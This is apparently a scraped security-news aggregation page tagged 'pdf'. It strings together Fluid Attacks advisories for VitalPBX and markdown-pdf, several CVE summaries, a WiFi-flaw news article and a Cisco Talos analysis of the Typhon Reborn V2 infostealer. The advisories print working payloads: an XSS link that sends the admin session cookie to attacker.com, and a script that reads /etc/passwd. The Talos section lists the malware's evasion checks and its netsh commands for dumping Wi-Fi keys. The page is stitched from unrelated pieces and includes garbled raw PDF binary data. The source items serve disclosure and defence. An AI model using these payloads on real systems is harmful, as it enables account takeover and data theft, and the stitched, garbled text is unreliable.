markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.

**markdown-pdf vulnerable to local file read via server side cross-site scripting (XSS)**

High severity GitHub Reviewed Published Apr 5, 2023 to the GitHub Advisory Database • Updated Apr 5, 2023

GHSA-qghr-877h-f9jh: markdown-pdf vulnerable to local file read via server side cross-site scripting (XSS)

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance's administrator account via a malicious link. This is possible because the application is vulnerable to XSS.

**Summary**

**Name**

VitalPBX 3.2.3-8 - Account Takeover via Reflected XSS

**Code name**

Smith

**Product**

VitalPBX

**Affected versions**

3.2.3-8

**State**

Public

**Release Date**

2023-04-10

**Vulnerability**

**Kind**

Reflected cross-site scripting (XSS)

**Rule**

008\. Reflected cross-site scripting (XSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CVSSv3 Base Score**

8.8

**Exploit available**

No

**CVE ID(s)**

CVE-2023-0486

**Description**

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance's administrator account via a malicious link. This is possible because the application is vulnerable to XSS.

**Vulnerability**

This vulnerability occurs because the application is vulnerable to XSS.

**Exploit**

To exploit this vulnerability, we just need to send a malicious url like the following to the administrator.

    http://vulnerable.com/?class=<img+src=1+onerror='sid=document.cookie.split(`;`)[0].split(`=`)[1];fetch(`https://attacker.com/vitalpbx/leak?sid=`%2bsid);'>&method=exportCDR&mode=add&refresh_mode=&cdr_filter_id=&source=&destination=&from=2023-01-25%2000%3A00%3A00&to=2023-01-25%2023%3A59%3A59&cdr-report-dt_length=10&format=pdf
    

The payload, in a more readable format, looks like this.

    sid=document.cookie.split(`;`)[0].split(`=`)[1];
    fetch(`https://attacker.com/vitalpbx/leak?sid=`+sid);
    

**Evidence of exploitation**

**Our security policy**

We have reserved the ID CVE-2023-0486 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: VitalPBX 3.2.3-8
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://vitalpbx.com/

**Timeline**

2023-01-24

Vulnerability discovered.

2022-01-24

Vendor contacted.

2023-04-10

Public Disclosure.

CVE-2023-0486: VitalPBX 3.2.3-8 - Account Takeover via Reflected XSS | Advisories | Fluid Attacks

3.  Relsb

**Summary**

**Name**

markdown-pdf 11.0.0 - Local File Read

**Code name**

RelsB

**Product**

markdown-pdf

**Affected versions**

Version 11.0.0

**State**

Public

**Release date**

2023-04-10

**Vulnerability**

**Kind**

Server Side XSS

**Rule**

425\. Server Side XSS

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CVSSv3 Base Score**

7.5

**Exploit available**

Yes

**CVE ID(s)**

CVE-2023-0835

**Description**

markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.

**Vulnerability**

This vulnerability occurs because the application does not validate that the Markdown content entered by the user is not malicious.

**Exploitation**

To exploit this vulnerability, we only need to send the following malicious Markdown to markdown-pdf:

**Exploit.md**

    <script>
        // Path Disclosure
        document.write(window.location);
        // Arbitrary Local File Read
        xhr = new XMLHttpRequest;
        xhr.onload=function(){document.write((this.responseText))};
        xhr.open("GET","file:///etc/passwd");
        xhr.send();
    </script>
    

Thus, when markdown-pdf parses the malicious Markdown, it will return the local file specified in the generated PDF.

**Evidence of exploitation**

**Our security policy**

We have reserved the ID CVE-2023-0835 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: electron-pdf 11.0.0
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://www.npmjs.com/package/markdown-pdf/

**Timeline**

2023-02-20

Vulnerability discovered.

2023-02-20

Vendor contacted.

2023-02-20

Vendor replied acknowledging the report.

2023-04-10

Public Disclosure.

CVE-2023-0835: markdown-pdf 11.0.0 - Local File Read via Server Side XSS | Advisories | Fluid Attacks

Envoy is an open source edge and service proxy designed for cloud-native applications. Compliant HTTP/1 service should reject malformed request lines. Prior to versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, There is a possibility that non compliant HTTP/1 service may allow malformed requests, potentially leading to a bypass of security policies. This issue is fixed in versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9.

CVE-2023-27491: RFC ft-ietf-quic-http: HTTP/3

An issue found in Wondershare Technology Co.,Ltd PDF Reader v.1.0.1 allows a remote attacker to execute arbitrary commands via the pdfreader_setup_full13143.exe file.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-27769: Wondershare PDF Reader Untrusted Search Path Vulnerability · Issue #11 · liong007/Wondershare

An issue found in Wondershare Technology Co.,Ltd PDFelement v9.1.1 allows a remote attacker to execute arbitrary commands via the pdfelement-pro_setup_full5239.exe file.

CVE-2023-27768: Wondershare PDFelement Untrusted Search Path Vulnerability · Issue #12 · liong007/Wondershare

Nextcloud is an open-source productivity platform. In Nextcloud Desktop client 3.0.0 until 3.8.0, Nextcloud Android app 3.13.0 until 3.25.0, and Nextcloud iOS app 3.0.5 until 4.8.0, a malicious server administrator can gain full access to an end-to-end encrypted folder. They can decrypt files, recover the folder structure and add new files.? This issue is fixed in Nextcloud Desktop 3.8.0, Nextcloud Android 3.25.0, and Nextcloud iOS 4.8.0. No known workarounds are available.

%PDF-1.5 %���� 157 0 obj << /Length 502 /Filter /FlateDecode >> stream xڅ�Mo�0��� ��8�Đ\[6��I�\*U�\*����. \`ʚ�{�\_�6UH�hf�gflS�C\]G�?���"�RF8CZrBs��6���J%��wN=����M���E��{�A:$/Z���읐�K�3�P�E�$B�H)Fr���B\_�z���vq"R�/�c��n0��8ER\\w!��68��:����IER�$B�,U�����e��j\*y5/L�����i"MT �\\Me<����O���~�ҟ�!XCh�pj��ն�A|��>Nx�\]cNNHb��t�����1\`(\[M�Ɯ�a��f1 ��g "Dh!�J�E��>�F�q"��6���7��|����S���8�nR��%�\[��m˽\_��)���\*ӄ��2BSx3��������U��� r=���� SDIV�̓��;�ڏކj� �o�mX�5�v\]H>�rj?ŏ��j���������������\\ۏ�L���\]iW��x�\_�$�O���v����\]��r�� endstream endobj 155 0 obj << /Type /XObject /Subtype /Form /FormType 1 /PTEX.FileName (./ETHlogo.pdf) /PTEX.PageNumber 1 /PTEX.InfoDict 164 0 R /BBox \[0 0 179 45\] /Resources << /ProcSet \[ /PDF \] /ExtGState << /R7 165 0 R >>>> /Length 11840 /Filter /FlateDecode >> stream x�m}Y�\\;�ܿVqWP>��e�\[P���>l�?���@T��}�!/y8� ������σ��������~����z~��W}�����k��~z?��~��ꥼ�s~�ޯ��ϟ\_}�W�5#s��2�ҟ\_C��\[�@��5����y�=���Z� ����f�i}��b����|�"m�׳����|���m���#}y���)��HG����-u�� �I�����N���Zr��\[���� �Pv}5�pB��Q9�\*���鼈��R�j�Q��v��2�}{'�-�G͹ۯ�fZ��e�������������:��������kt,t GX�����!2��9q����� �����%��k}#}�z��o����kT���>R��w��t�Χ2�{�%�>���ҧ������:������j(��\]��ѻ|�� �S���藶 ��5�d'Y�Jׄ��M0́<�E�6�1�+�O��9�N�we��k^Bd4:$�\\R���,��&��˩� �5�� �J/�\]\\z~{��ih�G�ߋ����j;|Nc\`"<�D��װ>^G�K�WE8-�\[X\_'�9�Ъ�܎㑕�^d&9d�a��m�Te�-�prp��\*FK ������^�p=���A˿X9�p��<��锋�~��&R�p�Nݢ�x ��EB�����(Z��=�z��9)O �� �o�&���-ui�p��"���rҏ�ń�.m�GOZS�kd~� �%�;���ҏk��(j8"����>\\I0\_��L��ENl���U�-J=.���oQi�|�~�|.��'}9��h\]�!�V�p���y��'�뎐u�#�usG"\*�, 7p��o�ɳF�V�Jz�\]Kzu�,�ֱҔ�0O���6w��-f�7��+ �K�!�ׂ�#� �PuC�2�bZ�J}����3�\[a ��6Q�cv�:�@�� .�y�J 2�tU�+�\*�µA+���}��b�j�.����ߋ���,��(��.�v)S�>����>ZЌz�aA˶i�5�نƍ/P� u�G�LgX}�.���&\`��ҨHC�v�%��Ž��R�D�HM|pS/��\*\[��R��Nʄ?疀ҵ�n^�LYp;FUJc�\]ł!8����$�۝�J\]�s��r��1�\*�,l�?��}�Ϣ��w�h�V�D;-\]�A��-!���y�8!��^>:����\]��97�B��F�g��%ly�t&mS7�0��߬�� H��غVKvL ٴ�/0\\Q��X��G�K�f,)�\*�9蹹%PÐ;�����D��!"K}�oB����ڂ��OUT��m��$�=X�l����2h\\����Y��y��U�M�z���蝳��I.���0 ��4��������JT��9�V�J�o���S�稈�\\R\[�� �'���Zl�Z0����C��.���@ '�\_{�E�\[�r��{�qax\\G��"�>d�+v+�\[���W��KD�c�zA�Wu�{��\`�l@�O�@$���M�xhW%�k��\`Fz�W�9�c����@�\\�{� n��1C��"���2��+�eX���qe�6'�&;��;��@��A����il��Ԫ�B�7hnoҿ�?Ѯ�SKd��(P���m���JUO"'�� ��za�(u\[�&b��n�W��xN\*q���ۨ�J߽8����r�W&B�jDf.�E�Eh�h��9=i��y�&j��S�^'E6�És�h"Eq�Q��t� �@\[�٥�׻eE@�C:B��r��+��5d��l�"m��3���9d��k"�\\�D}�e��wYGUn/!{�eq�rH �!b��!N^q�9D� ����"g�K\_��\`TE�%fؾ,"���'�XD�#7��E����ǂO��"��;��T/D P��G��L�q��Z�;�8}������K>���Eue���ן�8��� U�\[��:���ҋ&����ЖJL�����0�;ൽ�C����߼ym �������:��(8\[fg��\[���Ho�\_���aY&5I�$H/io�V�,���ED43��s�(�<��zoj�x �th�� :��Etou�M��� 2�V ��0N����X�i��g�H�p��{�;co�P���5)ן�����;������b��g�MoL|o{�"������� :�V ��p\_�S#���)��d�=�߰/�Q��˵�qD�7J�a/O�����vd��Eí#Lm.\_��a��U\*M��\]F�)K��.w��&�s:������or�P�1?����|c�xVBX�3��A� �p������Qx�󃋰5II���t��B�bXܻ�.��( ���C�Ò�8�a�e\]���a\\O66 c336

CVE-2023-28999

By Deeba Ahmed
The findings are to be presented at the Usenix Security Symposium.
This is a post from HackRead.com Read the original post: WiFi Flaws Allow Network Traffic Interception on Linux, iOS, and Android

The WiFi flaw discovered by researchers from Northeastern University and KU Leuven can impact a wide range of operating systems, including Linux, iOS, and Android, leaving them vulnerable to potential interception of network traffic if exploited by hackers.

Wireless networking stacks found in a wide range of operating systems were left vulnerable due to an ambiguity in the WiFi specification, explained academics from Northeastern University and KU Leuven in a paper (PDF) titled “Framing Frames: Bypassing WiFi Encryption by Manipulating Transmit Queues.” The ambiguity can allow exposure of network traffic if exploited by threat actors.

**Research Findings**

According to researchers Domien Schepers, Aanjhan Ranganathan, and Mathy Vanhoef, the issue is caused by a fundamental design flaw detected in the IEE 802.11 WiFi protocol standard. The devices impacted by this issue include those running FreeBSD, Linux, iOS, and Android. Aruba, Asus, and D-Link devices were also examined for this research.

If exploited successfully, it can allow attackers to hijack TCP connections. Additionally, they can intercept client and web traffic. Vanhoef shared these findings at the 2023 Real World Crypto (cryptography) Symposium in Tokyo, Japan. The paper is to be presented at the Usenix Security Symposium.

**Security Advice**

*   Securing your Spectrum-compatible WiFi routers
*   How To Keep Your Router, WiFi Safe From Hackers
*   Wireless Router Security: Set up a WiFi router securely

**What’s The Issue?**

Vanhoef explained the findings in a video presentation, sharing that an attack called kr00k revealed by ESET in 2019 shares similarities with the attack his team had developed as both involve similar vulnerabilities, indicating that the IEEE 802.11 WiFi standard cannot articulately handle buffered framed. 

WiFi frames contain different types of data related to network routing and traffic and include a header, body, and trailer, which allow data to move from one point to another. WiFi access points queue frames linked with different network layers and buffers them until the right network sources are available to send them. In this case, researchers noted that the WiFi specification didn’t describe how to manage the security context in buffered frames.

**How Can The Flaw Be Abused?**

Researchers wrote that attackers would exploit power-save mechanisms in endpoint devices to trick access points into exposing data frames in plaintext. Or else an all-zero key would allow them to encrypt it. Due to the power-save bit’s “unprotected nature” in a frame’s header, the issue allows an attacker to enforce queue frames for a particular client.

This would result in disconnecting and executing a DoS (denial of service) attack. The objective is to leak the frame from the access point linked to the victim’s client station. It works because, during the security context changes, most WiFi stacks didn’t appropriately dequeue/purge their transmit queues.  

The attacker can send a spoofed power-save frame with an Association or Authentication frame and successfully reset the wireless connection by making the access point respond by removing the client’s pairwise key. If the adversary uses a Wake-Up frame, the access point will send the buffered data under an undefined security context and prompt a data frame leak.

Furthermore, in a security context override attack, the access points can encrypt unqueued frames through the attacker’s chosen key, thus, rendering the encryption ineffective. Researchers have published a proof-of-concept exploit titled MacStealer. This tool tests networks to identify vulnerability to a client isolation bypass.

1.  WiFi software firm leaked millions of users’ data
2.  iPhone Wifi bug exposed devices to remote attacks
3.  Avoid being Pwned by bugs residing in the WiFi chip
4.  Flaws exposed all WiFi enabled devices to FragAttacks

WiFi Flaws Allow Network Traffic Interception on Linux, iOS, and Android

The stealer is for sale on dark web forums for $59 a month, or $540 for a lifetime subscription, which is relatively inexpensive compared to other infostealers.

*   The developer of the Typhon Reborn information stealer released version 2 (V2) in January, which included significant updates to its codebase and improved capabilities.
*   Most notably, the new version features additional anti-analysis and anti-virtual machine (VM) capabilities to evade detection and make analysis more difficult.
*   We assess Typhon Reborn 2 will likely appear in future attacks, as we have already observed samples in the wild and multiple purchases of the malware.
*   The stealer is currently offered on underground forums for $59 per month but also offers a lifetime subscription for $540, which is inexpensive compared to competing infostealers.
*   The stealer can harvest and exfiltrate sensitive information and uses the Telegram API to send stolen data to attackers.

**Typhon Reborn V2 release  
**

Typhon is an information stealer first publicly reported in mid-2022. It steals sensitive information, such as cryptocurrency wallet data, from a variety of applications and uses a “file grabber” to collect a predefined list of file types, then exfiltrates them via Telegram. Since its initial arrival, it has undergone continuous development, with Typhon Reborn being released just several months later in late 2022. The malware’s developer announced the release of Typhon Reborn V2 on Jan. 31, 2023 on the popular Russian language dark web forum XSS. Samples uploaded to public repositories indicate that the new version of Typhon Reborn has been in the wild since December 2022.

_Post announcing Typhon Reborn V2 release._

In the latest version, the malware developer claimed to have refactored the codebase and significantly improved existing capabilities present within the malware, which Cisco Talos independently confirmed. It is available for $59 per month or a lifetime subscription for $540, which is inexpensive compared to competing infostealers. Analysis of the cryptocurrency wallet from which the attacker collects payments suggests that multiple adversaries have purchased access to the stealer, making it likely that it will be used in attacks moving forward.

**Notable changes in Typhon Reborn V2**

The code in Version 2 of Typhon Reborn was heavily modified compared to Version 1, based on our analysis.

_Code changes between Typhon Reborn V1 and V2._

For example, Version 2 has significantly more anti-analysis and anti-virtualization capabilities, as evidenced by comparing the anti-analysis routines present in each version. For example, the developer made several changes to the logic that prevents the malware from infecting systems that match predefined criteria. That includes heavily expanding this list of criteria to include present usernames, CPUIDs, applications and processes present on the system, debugger/emulation checks, and geolocation data for countries that attackers may wish to avoid.

_Anti-analysis routine comparison between Typhon Reborn versions._

Finally, in Typhon Reborn V2 samples that we analyzed, the developer appeared to have removed the functionality that establishes persistence across reboots. Instead, V2 simply terminates itself after data exfiltration.

**Dissecting Typhon Reborn V2**

In Typhon Reborn V2, the malware complicates analysis via string obfuscation by using Base64 encoding and applying the XOR function to various strings. During execution, the malware decodes the Base64, generating a UTF-8 character-encoded string that is then deobfuscated using an XOR key stored in the malware’s configuration or hard-coded into DecryptString(). The XOR key used is based on the mode passed when the function is called each time. The resulting string is then decoded from Base64 again, creating a plain text string to continue the operation.

_String deobfuscation functionality._

The malware’s operations are determined by a series of parameters stored in the malware’s configuration that dictate what information should be collected, keys used for string deobfuscation and geolocations where the malware should not execute.

_Typhon Reborn V2 configuration parameters._

**Anti-analysis and sandbox evasion**

When Typhon Reborn V2’s main() method is executed, it checks the malware configuration to determine if anti-analysis has been enabled. If it is enabled, the malware will attempt to conduct a series of anti-analysis checks to determine if it is being executed in an analysis or sandbox environment.

_Anti-analysis checks._

If any of the checks fail, the malware will call a SelfRemove() class to self delete, by creating a batch file in the temp directory with the following contents.

    chcp 65001
    TaskKill /F /IM [MALWARE_PID]
    Timeout /T 2 /Nobreak
    

This batch file is then executed via the Windows command processor, thus terminating the malware’s execution.

_Self-removal functionality._

The overall execution flow of the various anti-analysis checks is shown below.

_Anti-analysis process flow._

The malware uses Windows Management Instrumentation (WMI) to retrieve information about the Graphics Processing Unit (GPU) on the system.

SELECT * FROM Win32_VideoController

It then checks the returned value to determine if it contains the string vmware svga.

Then, it makes an HTTP request to the following URL to determine if the system is located in a network associated with a hosting provider, colocation facility, or data center environment. The API returns either a “True” or “False” response based on the location of the system which is used to determine the type of environment in which the system is located.

hxxp://ip-api[.]com/line/?fields=hosting

Then, it checks for the presence of the following DLLs associated with common security products that may be installed.

*   SbieDLL.dll (Sandboxie)
*   SxIn.dll (360 Total Security)
*   Sf2.dll (Avast)
*   Snxhk.dll (Avast)
*   cmdvrt32.dll (Comodo Internet Security)

It also retrieves the system manufacturer and model via WMI using the following query:

Select * from Win32_ComputerSystem

The retrieved information is checked to determine if it contains the following hypervisor-related strings.

*   VIRTUAL
*   vmware
*   VirtualBox

The malware also uses WMI to collect information about the system’s video controller.

SELECT * FROM Win32_VideoController

This information is then checked to determine if it contains the strings VMware or VBox.

Next, the malware uses CheckRemoteDebuggerPresent to determine if the process is being debugged.

The malware then obtains the current system time, initiates a short (10ms) sleep, then obtains the system time again. It compares the delta between the two times to what is expected during normal operations to determine if the process is being run in a debugging session.

The command line argument used to initially launch the malware is then obtained to determine if the sample was executed using the file name detonate.exe or if the argument -–detonate was passed when initiating execution.

The malware also checks the Windows Registry (SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall) to determine if any subkeys reference the following common analysis tools:

*   dnSpy
    

*   PDFStreamDumper
    

*   Ghidra
    

*   Wireshark
    

*   Autoruns
    

*   x64dbg
    

*   HashCalc
    

*   Process Hacker
    

  

*   FileInsight
    

*   Process Monitor
    

  

Next, WMI is queried to obtain the ProcessorId (CPUID) for the system using the following query.

Select ProcessorId From Win32_Processor

The CPUID is then checked against the following list of CPUIDs under which the malware will not execute:

*   4AB2DFCCF4
*   BFEBFBFF000906E9
*   078BFBFF000506E3
*   078BFBFF00000F61
*   178BFBFF00830F10
*   0F8BFBFF000306C1

The malware also determines the user account context under which the malware is executing and will terminate if the username matches the following values:

*   IT-ADMIN
    

*   sand box
    

*   Abby
    

*   Paul Jones
    

*   maltest
    

*   WDAGUtilityAccount
    

*   WALKER
    

*   malware
    

*   Frank
    

*   Sandbox
    

*   virus
    

*   fred
    

*   timmy
    

*   John Doe
    

*   JOHN-PC
    

*   tim
    

*   Emily
    

*   Lisa
    

*   vboxuser
    

*   CurrentUser
    

*   John
    

*   sandbox
    

*   test
    

  

*   Peter Wilson
    

*   TVM
    

  

The malware then obtains the list of currently running processes on the system and checks the executable path associated with them against the following list of executable file names associated with common analysis tools.

*   ollydbg.exe
    

*   idaq64.exe
    

*   processhacker.exe
    

*   immunitydebugger.exe
    

*   tcpview.exe
    

*   wireshark.exe
    

*   autoruns.exe
    

*   dumpcap.exe
    

*   de4dot.exe
    

*   hookexplorer.exe
    

*   ilspy.exe
    

*   lordpe.exe
    

*   dnspy.exe
    

*   petools.exe
    

*   autorunsc.exe
    

*   resourcehacker.exe
    

*   filemon.exe
    

*   x32dbg.exe
    

*   procmon.exe
    

*   x64dbg.exe
    

*   regmon.exe
    

*   fiddler.exe
    

*   idaq.exe
    

  

It then attempts to test internet connectivity by making an HTTP request to http://www.google.com.

The malware again obtains the execution environment to determine if its filename matches the following list:

*   detonate
*   virus
*   test
*   malware
*   maltest

Next, the malware checks the Programs subdirectory under the Windows Start Menu for the presence of the following analysis tools:

*   dnspy
    

*   x86dbg
    

*   detect it easy
    

*   ghidra
    

*   die
    

*   ida
    

*   procmon
    

*   fiddler
    

*   process monitor
    

*   scylla
    

*   process hacker
    

*   winhex
    

*   ilspy
    

*   hxd
    

*   x64dbg
    

*   de4dot
    

It then attempts to locate wine_get_unix_file_name to determine if Wine is being used in an analysis environment.

Next, it checks the SYSTEM_CODEINTEGRITY_INFORMATION structure to determine if unsigned or test-signed drivers are allowed on the system (CODEINTEGRITY_OPTION_ENABLED, CODEINTEGRITY_OPTION_TESTSIGN).

The malware also checks the SYSTEM_KERNEL_DEBUGGER_INFORMATION structure to determine if kernel mode debugging is enabled (KernelDebuggerEnabled).

Then, the malware checks various system DLLs for the presence of instructions that may indicate that the environment is instrumented for analysis.

The malware also features two geolocation avoidance mechanisms. The first one allows for the specification of a list of countries in the malware’s config that the attacker does not want to infect systems in. The malware uses the IP-API service to determine where the system is located and compares it against the user-supplied list.

_IP geolocation check._

If the system is located in one of these countries, the malware calls the SelfRemove() functionality previously described.

The malware also contains a RunAntiCIS() feature that specifically avoids infecting systems located in Commonwealth of Independent States (CIS) countries.

_CIS country avoidance._

**System and network data collection**

If the victim’s environment passes all the malware’s anti-analysis checks, Typhon Reborn V2 begins collecting and exfiltrating sensitive information. First, the malware creates a randomly named subdirectory under %LOCALAPPDATA%, then the malware begins generating stealer logs that will ultimately be staged in that subdirectory for exfiltration.

To generate the logs, the malware retrieves survey information about the infected system and writes it to the stealer log. It collects a variety of system information including user data, system data and network information, using various mechanisms such as WMI queries, environment variables, and registry keys. The malware uses api[.]ipify[.]org to obtain the public IP of the infected system. This information is saved in the malware’s working directory (UserData.txt) along with a text file (BuildID.txt) containing the Telegram channel for the malware’s developer. A list of installed software is also generated using WMI and saved (InstalledSoftwares.txt). A list of hard drives present within the system is also saved (Drive Info.txt).

The malware also captures screenshots from infected systems saved in the same directory as the stealer logs.

_Screenshot capture._

The stealer also collects saved Wi-Fi network information and stores it (Wifi Passwords.txt) using the following system commands:

cmd.exe /C  chcp 65001 && netsh wlan show profile | findstr All

cmd.exe /C timeout /t 5 /nobreak > nul && netsh wlan show profile name=<PROFILE_NAME> key=clear | findstr Key

It also attempts to scan for available wireless networks and stores information about them (Available Networks.txt).

cmd.exe /C timeout /t 5 /nobreak > nul && netsh wlan show networks mode=bssid

A list of currently running processes and process executable paths is collected and saved as well (Running Processes.txt).

**Application data collection**

Once basic system information has been collected and saved, the stealer begins iterating through specific applications and collecting data based on the malware’s configuration. The stealer currently supports collecting passwords, tokens, and other sensitive information from the applications shown below.

_Typhon Reborn V2 Application Support._

**Gaming clients**

Typhon Reborn V2 can steal data from additional applications, including various gaming clients. However, this functionality was never actually called from the main() method of the malware in the latest version analyzed.

The malware also contains a FileGrabber() feature that is used to collect and exfiltrate files of interest from victim environments. It iterates through all drives detected on the system and attempts to determine whether any are removable storage devices, network storage locations or optical drives.

_Drive enumeration._

Each drive that meets this criterion has its root directory added to a list of target directories. The malware then iterates through all of the target directories, copying contents that match the parameters in the malware’s configuration to the malware’s working directory.

The two parameters Config.GrabberSize and Config.GrabberFileExtensions defined in the malware’s configuration determine the operation of the file collection capability.

_File grabber configuration parameters._

**Data exfiltration**

Once the stealer has finished collecting information from infected systems, the data is stored in a compressed archive and exfiltrated via HTTPS using the Telegram API. First, the malware sends an overview log containing survey information and basic statistics related to the data collected.

_Stealer log transmission._

Then, the malware sends another Telegram message containing the data being exfiltrated from the infected system.

_Data exfiltration._

Once the data has been successfully transmitted to the attacker, the archive is then deleted from the infected system. The malware then calls SelfRemove.Remove() to terminate execution.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 61532-61533, 300476.

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

**Indicators of Compromise (IOCs)**

IOCs for this research can also be found at our Github repository here

Typhon Reborn V2: Updated stealer features enhanced anti-analysis and evasion capabilities

Digging through manuals for security cameras, a group of gearheads found sinister details and ignited a new battle in the US-China tech war.

Tag

#pdf